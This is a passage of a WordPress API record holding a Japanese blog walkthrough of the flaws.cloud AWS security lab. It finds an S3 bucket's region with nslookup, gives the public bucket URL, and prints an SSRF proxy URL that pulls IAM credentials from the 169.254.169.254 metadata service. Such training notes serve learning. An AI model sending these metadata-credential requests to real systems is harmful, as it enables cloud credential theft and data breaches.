FLAWS<\/a>\u3092\u30cf\u30f3\u30ba\u30aa\u30f3\u5f62\u5f0f\u3067\u5b9f\u65bd\u3057\u305f\u3002\u305d\u306e\u969b\u306e\u30e1\u30e2\u3002
\n\u3061\u306a\u307f\u306bflaws\u306e\u30cd\u30bf\u3070\u308c\u306b\u306a\u308b\u3002<\/p>\nS3\u3092\u516c\u958b\u3057\u3066\u3044\u308b\u5834\u5408<\/h3>\n
\u540d\u524d\u89e3\u6c7a\u3059\u308b\u3053\u3068\u3067\u30ea\u30fc\u30b8\u30e7\u30f3\u304c\u308f\u304b\u308b\u3002<\/p>\n
\r\nC:\\Users\\shimizu>nslookup flaws.cloud\r\n\r\n\u6a29\u9650\u306e\u306a\u3044\u56de\u7b54:\r\n\u540d\u524d: flaws.cloud\r\nAddress: 52.218.232.234\r\n\r\nC:\\Users\\shimizu>nslookup 52.218.232.234\r\n\r\n\u540d\u524d: s3-website-us-west-2.amazonaws.com\r\nAddress: 52.218.232.234\r\n<\/pre>\nS3\u3067\u516c\u958b\u3057\u3066\u3044\u308b\u305f\u3081\u30d0\u30b1\u30c3\u30c8\u540d\u306fflaws.cloud\u3068\u306a\u308b\u3002\u3064\u307e\u308a\u4ee5\u4e0bURL\u3067\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u3002
\n\u610f\u56f3\u305b\u305a\u30c7\u30fc\u30bf\u3092\u516c\u958b\u3057\u3066\u3044\u305f\u5834\u5408\u3001\u3059\u3079\u3066\u6f0f\u6d29\u3059\u308b\u3002
\nhttp:\/\/flaws.cloud.s3-us-west-2.amazonaws.com\/<\/p>\n
SSRF(Server Side Request Forgery)\u653b\u6483<\/h3>\n
\u30ea\u30d0\u30fc\u30b9\u30d7\u30ed\u30ad\u30b7\u8a2d\u5b9a\u304c\u8106\u5f31\u3067\u3042\u308c\u3070\u3001\u5185\u90e8\u306e\u60c5\u5831\u3092\u53d6\u5f97\u3059\u308b\u3053\u3068\u304c\u53ef\u80fd\u306b\u306a\u308b\u3002
\n\u540c\u69d8\u306e\u624b\u6cd5\u3067Capital One\u306e\u500b\u4eba\u60c5\u5831\u304c\u6d41\u51fa\u3057\u3066\u3044\u308b\u3002
\nhttp:\/\/4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud\/proxy\/169.254.169.254\/latest\/meta-data\/iam\/security-credentials\/flaws<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6982\u8981 \u3068\u3042\u308b\u8a3a\u65ad\u54e1\u3068Security-JAWS #01\u306b\u53c2\u52a0\u3057\u305f\u3002 \u3068\u3066\u3082\u3088\u3044\u982d\u306e\u4f53\u64cd\u306b\u306a\u3063\u305f\u3002 FLAWS\u3092\u30cf\u30f3\u30ba\u30aa\u30f3\u5f62\u5f0f\u3067\u5b9f\u65bd\u3057\u305f\u3002\u305d\u306e\u969b\u306e\u30e1\u30e2\u3002 \u3061\u306a\u307f\u306bflaws\u306e\u30cd\u30bf\u3070\u308c\u306b\u306a\u308b\u3002 S3\u3092\u516c\u958b\u3057\u3066\u3044\u308b\u5834\u5408 \u540d\u524d\u89e3 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[35],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3383"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3383"}],"version-history":[{"count":3,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3383\/revisions"}],"predecessor-version":[{"id":3386,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3383\/revisions\/3386"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}